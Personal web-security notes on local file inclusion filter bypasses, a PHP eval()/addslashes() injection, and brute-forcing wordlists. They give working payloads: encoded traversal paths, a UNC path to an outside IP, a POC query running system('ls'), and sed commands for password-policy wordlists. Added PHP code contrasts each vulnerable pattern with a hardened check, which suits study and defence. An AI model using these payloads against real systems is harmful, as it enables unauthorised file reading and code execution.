Web
Disclaimer: These are my personal notes, published "as-is"
without warranty or guarantee of any kind. Use at your own risk. Licensed
CC BY-NC-SA 4.0.
Local file inclusion #
- Basic traversal: ../
- A literal find/replace of ../ can be bypassed by URL-encoding part of the sequence, so the filter never sees the string ../; the decoded ..// still walks up one directory because repeated slashes collapse during path resolution.
  - e.g. /uploads/%2e%2e/%2fsys/class/net/eth0/address → /uploads/..//sys/class/net/eth0/address
- Resolve a network (UNC) path: http://host.tld/?page=//11.22.33.44/@OsandaMalith
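Added example (not code from the original notes): a naive filter that strips the literal string ../ from the still-encoded parameter and decodes afterwards, beside a hardened check that rejects anything but a flat file name. It also covers the ....// variant that survives a single non-recursive replacement. The base directory, file names and inputs are constructed for the demo.

```php
<?php
// Added example, not code from the original notes. It models a filter that
// removes "../" from the raw (still URL-encoded) parameter and decodes
// afterwards, then shows a hardened check. The base directory, file names
// and inputs are constructed for the demo.

declare(strict_types=1);

const UPLOAD_DIR = '/var/www/uploads';   // hypothetical base directory

// Vulnerable: one literal, non-recursive find/replace applied before decoding.
function vulnerablePath(string $rawParam): string
{
    $filtered = str_replace('../', '', $rawParam);   // misses %2e%2e/%2f and ....//
    return UPLOAD_DIR . '/' . urldecode($filtered);
}

// Lexical approximation of how the kernel resolves the path: "//" and "."
// collapse, ".." drops the previous segment. (A live system also follows
// symlinks, which is why realpath() plus a prefix check is the real test
// when subdirectories must be allowed.)
function lexicalNormalize(string $path): string
{
    $segments = [];
    foreach (explode('/', $path) as $seg) {
        if ($seg === '' || $seg === '.') {
            continue;
        }
        if ($seg === '..') {
            array_pop($segments);
            continue;
        }
        $segments[] = $seg;
    }
    return '/' . implode('/', $segments);
}

// Hardened: decode first, then accept only a flat file name. Anything with a
// separator, a leading dot or a ".." is rejected instead of "cleaned".
function safePath(string $rawParam): ?string
{
    $decoded = urldecode($rawParam);
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]*\z/', $decoded)
        || strpos($decoded, '..') !== false) {
        return null;
    }
    return UPLOAD_DIR . '/' . $decoded;
}

// Constructed inputs: a benign name, the payload from the notes, and the
// "....//" variant that survives a single non-recursive replacement.
$inputs = [
    'avatar.png',
    '%2e%2e/%2fsys/class/net/eth0/address',
    '....//sys/class/net/eth0/address',
];

foreach ($inputs as $in) {
    printf("%s\n  vulnerable -> %s\n  safe       -> %s\n",
        $in,
        lexicalNormalize(vulnerablePath($in)),
        safePath($in) ?? 'rejected');
}
```

Run with `php lfi_filter.php` (name assumed). For both traversal inputs the vulnerable path normalises to a location outside UPLOAD_DIR, while the hardened check rejects them and only lets the plain file name through.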
PHP - Bypass eval() with addslashes() #
Where a value from a URL is passed through addslashes() and then embedded in a double-quoted string that eval() runs. addslashes() only escapes quotes, backslashes and NUL, and the payload needs none of them: inside a double-quoted string PHP evaluates ${expr} to obtain a variable name, so the inner eval() runs.
POC: ?str=${eval($_GET[1])}&1=phpinfo();
For example: GET /?format=${eval($_GET[1])}&1=system('ls');
https://www.programmersought.com/article/30723400042/
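Added example (not code from the original notes or the linked article): the vulnerable pattern the POC targets beside a version that never compiles user input. The template string and the allow-list are hypothetical; the parameter names (format, 1) follow the POC above, and the inner statement only sets a marker instead of calling phpinfo() or system().

```php
<?php
// Added example, not code from the original notes or the linked article.
// The template string and the allow-list are hypothetical; the parameter
// names (format, 1) follow the POC in the notes.

declare(strict_types=1);

// Vulnerable: the escaped value lands inside a double-quoted string that
// eval() compiles. addslashes() only escapes ' " \ and NUL, and the payload
// ${eval($_GET[1])} contains none of them. PHP evaluates ${ expr } inside a
// double-quoted string to obtain a variable name, so the inner eval() runs.
// PHP 8.2+ also emits a deprecation notice for ${expr} and an
// undefined-variable warning; the inner eval() runs regardless.
function renderVulnerable(array $params): string
{
    $format = addslashes($params['format'] ?? 'plain');
    $out = '';
    eval('$out = "format=' . $format . '";');
    return $out;
}

// Hardened: no eval() at all. User input selects from an allow-list and is
// never compiled as code.
function renderSafe(array $params): string
{
    $allowed = ['plain', 'json', 'html'];   // hypothetical set of formats
    $format = $params['format'] ?? 'plain';
    if (!in_array($format, $allowed, true)) {
        $format = 'plain';
    }
    return 'format=' . $format;
}

// Constructed request: the outer payload and a harmless inner statement that
// leaves a marker instead of calling phpinfo() or system().
$_GET['format'] = '${eval($_GET[1])}';
$_GET[1]        = '$GLOBALS["executed"] = true;';

$executed = false;
echo renderVulnerable($_GET), "\n";
var_dump($executed);   // did the injected statement run?

$executed = false;
echo renderSafe($_GET), "\n";
var_dump($executed);   // the same input handled as data only
```

Run with `php eval_addslashes.php` (name assumed). The first var_dump shows the marker flipped by the injected statement, the second shows it untouched; the fix is not a better escaping function but removing eval() from the path of user input.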
Command injection #
Characters #
See https://academy.hackthebox.com/module/109/section/1032
Resources #
File upload #
See https://academy.hackthebox.com/module/136/section/1291
Brute forcing #
- Hydra - logins and forms.
- CUPP - customized wordlists.
- Username Anarchy - username generator.
- See also other tools.
If we know the password rules (GNU sed, edits words.txt in place):
sed -ri '/^.{,7}$/d' words.txt                # drop words shorter than 8 characters
sed -ri '/[!-/:-@\[-`\{-~]+/!d' words.txt     # drop words with no special character
sed -ri '/[0-9]+/!d' words.txt                # drop words with no digit